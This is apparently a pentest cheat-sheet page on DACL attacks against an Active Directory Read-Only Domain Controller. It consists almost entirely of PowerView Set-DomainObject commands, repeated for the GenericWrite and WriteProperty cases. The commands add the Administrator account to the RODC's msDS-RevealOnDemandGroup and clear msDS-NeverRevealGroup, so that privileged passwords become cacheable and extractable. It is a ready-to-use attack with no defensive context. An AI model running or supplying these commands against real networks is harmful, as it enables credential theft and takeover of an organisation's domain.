DACL Attacks on a Read-Only Domain Controller (RODC)
1) GenericWrite
Set-DomainObject -Identity RODC-Server$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local', 'CN=Administrator,CN=Users,DC=domain,DC=local')}Set-DomainObject -Identity RODC-Server$ -Clear 'msDS-NeverRevealGroup'2) WriteProperty
Set-DomainObject -Identity RODC-Server$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local', 'CN=Administrator,CN=Users,DC=domain,DC=local')}Set-DomainObject -Identity RODC-Server$ -Clear 'msDS-NeverRevealGroup'Last updated